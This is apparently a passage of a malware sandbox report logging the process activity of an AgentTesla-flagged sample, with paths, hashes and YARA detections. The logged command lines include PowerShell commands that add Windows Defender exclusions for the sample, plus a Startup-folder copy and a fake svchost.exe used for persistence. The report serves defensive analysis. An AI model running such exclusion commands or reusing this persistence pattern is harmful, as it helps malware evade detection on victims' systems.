                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0xa50000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 44%, ReversingLabs

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:56
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:58
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:57
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0x210000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:21:02
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:21:10
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  Imagebase:0xb50000
                                                                                                                  File size:55400 bytes
                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:21:10
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:21:11
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                                                                                                                  Imagebase:0xf60000
                                                                                                                  File size:434592 bytes
                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:21:13
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 44%, ReversingLabs

                                                                                                                  General

                                                                                                                  Start time:15:21:21
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                                                                                                                  Imagebase:0xf60000
                                                                                                                  File size:434592 bytes
                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:21:23
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                                                                                                                  Imagebase:0x4d0000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >